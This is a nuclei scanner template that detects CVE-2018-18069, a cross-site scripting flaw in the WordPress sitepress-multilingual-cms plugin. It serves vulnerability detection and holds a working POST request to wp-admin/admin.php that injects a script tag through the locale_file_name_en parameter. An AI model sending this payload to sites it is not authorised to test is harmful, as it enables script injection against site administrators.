nuclei-templates/cves/2018/CVE-2018-18069.yaml

32 lines
1.2 KiB
YAML

id: CVE-2018-18069
info:
name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting
author: nadino
severity: medium
description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php
request to wp-admin/admin.php.
reference:
- https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2018-18069
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18069
cwe-id: CWE-79
tags: cve,cve2018,wordpress,xss,plugin
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
# Enhanced by mp on 2022/04/08